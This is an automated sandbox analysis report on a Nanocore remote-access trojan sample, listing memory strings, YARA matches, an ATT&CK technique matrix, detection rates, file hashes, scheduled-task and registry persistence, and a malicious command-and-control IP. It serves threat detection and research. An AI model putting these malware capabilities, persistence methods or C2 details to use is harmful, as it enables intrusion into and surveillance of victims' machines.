eActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: nD2ozRD7MN.exe, 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nD2ozRD7MN.exe, 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nD2ozRD7MN.exe, 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dnshost.exe, 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dnshost.exe, 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	112 Process Injection	2 Masquerading	11 Input Capture	1 System Time Discovery	Remote Services	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	112 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Hidden Files and Directories	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nD2ozRD7MN.exe	50%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
nD2ozRD7MN.exe	39%	Virustotal		Browse
nD2ozRD7MN.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\DNS Host\dnshost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DNS Host\dnshost.exe	50%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
C:\Program Files (x86)\DNS Host\dnshost.exe	39%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://google.com	100%	URL Reputation	malware
http://google.com	100%	URL Reputation	malware
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
66.63.187.113	8%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
66.63.187.113	true	8%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.25.dr	false	URL Reputation: safe	unknown
http://google.com	nD2ozRD7MN.exe, 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware URL Reputation: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	nD2ozRD7MN.exe, 00000000.00000002.2015700428.0000000003194000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000009.00000002.2059154791.0000000002889000.00000004.00000800.00020000.00000000.sdmp, dnshost.exe, 0000000F.00000002.2086828450.0000000003457000.00000004.00000800.00020000.00000000.sdmp, dnshost.exe, 00000013.00000002.2155168860.0000000002949000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.63.187.113	unknown	United States		8100	ASN-QUADRANET-GLOBALUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546575
Start date and time:	2024-11-01 06:18:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nD2ozRD7MN.exe renamed because original name is a hash value
Original Sample Name:	8e2827146c4c433affba78c88fd685db.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@29/29@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 440 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:18:54	API Interceptor	170827x Sleep call for process: nD2ozRD7MN.exe modified
01:18:56	API Interceptor	72x Sleep call for process: powershell.exe modified
01:18:59	API Interceptor	4x Sleep call for process: dnshost.exe modified
01:21:27	API Interceptor	1x Sleep call for process: WerFault.exe modified
06:18:56	Task Scheduler	Run new task: DNS Host path: "C:\Users\user\Desktop\nD2ozRD7MN.exe" s>$(Arg0)
06:18:59	Task Scheduler	Run new task: DNS Host Task path: "C:\Program Files (x86)\DNS Host\dnshost.exe" s>$(Arg0)
06:18:59	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DNS Host C:\Program Files (x86)\DNS Host\dnshost.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
66.63.187.113	Proforma Invoice347.doc	Get hash	malicious	Nanocore	Browse
66.63.187.113	S1qgnlqr1V.exe	Get hash	malicious	Nanocore	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	Request for Quotation.pdf.exe	Get hash	malicious	XWorm	Browse	104.223.35.76
	SS Bottmac Engineers Pvt. Ltd..exe	Get hash	malicious	XWorm	Browse	104.223.35.76
	.main.elf	Get hash	malicious	Xmrig	Browse	66.63.187.195
	Proforma Invoice347.doc	Get hash	malicious	Nanocore	Browse	66.63.187.113
	S1qgnlqr1V.exe	Get hash	malicious	Nanocore	Browse	66.63.187.113
	Quotation_PMV-1060_AVR1_PMV_1513_AVR1_PMV_1514_AVR1_PMV_1515.exe	Get hash	malicious	GuLoader, StormKitty	Browse	204.44.127.85
	splarm5.elf	Get hash	malicious	Unknown	Browse	190.9.40.179
	Master.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	141.98.197.31
	setup_office.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	141.98.197.31
	111.out.elf	Get hash	malicious	Unknown	Browse	141.98.197.31

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	776192
Entropy (8bit):	7.686909804415201
Encrypted:	false
SSDEEP:	12288:fn9InteYPjOFGGCA2ythZoESN0vXMgmW3oSrnvuiYZftZvskj2/Q4AyrrRPdh:fEPtpy/2ESNimW3oovZYB2o4JPd
MD5:	8E2827146C4C433AFFBA78C88FD685DB
SHA1:	DE632114A70A9AD4B16ED686E48477F398531AE0
SHA-256:	058E2C02B8CFB93B480EA8CFAC08E967B39631A579256EBEE27FB7472194C1EA
SHA-512:	BA45A34ECB7D176392C43CD8B80D8181E77F1CC6536459163439A4456389A6208E053BC6A449F7974595D44B69A269833958BFE1EDE7498F31538B84DDBFF151
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 39%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0......(........... ........@.. .......................@............@.....................................O........%................... ....................................................... ............... ..H............text...(.... ...................... ..`.rsrc....%.......&..................@..@.reloc....... ......................@..B........................H.......@....o...........(..............................................R.(.......(....}........0..8........s......r...p...o.....s......s.......r...po....&...+....0..a..........s........r...p(........(.......r...p(........(.......r$..p(........(....s......r2..p...o.........0.............s........r...p(........(.......r...p(........(.......r$..p(........(.......r...p(..........O...(....s......r...p...o......{....o.........0..F..........s........r...p(.........O...(....s...

C:\Program Files (x86)\DNS Host\dnshost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
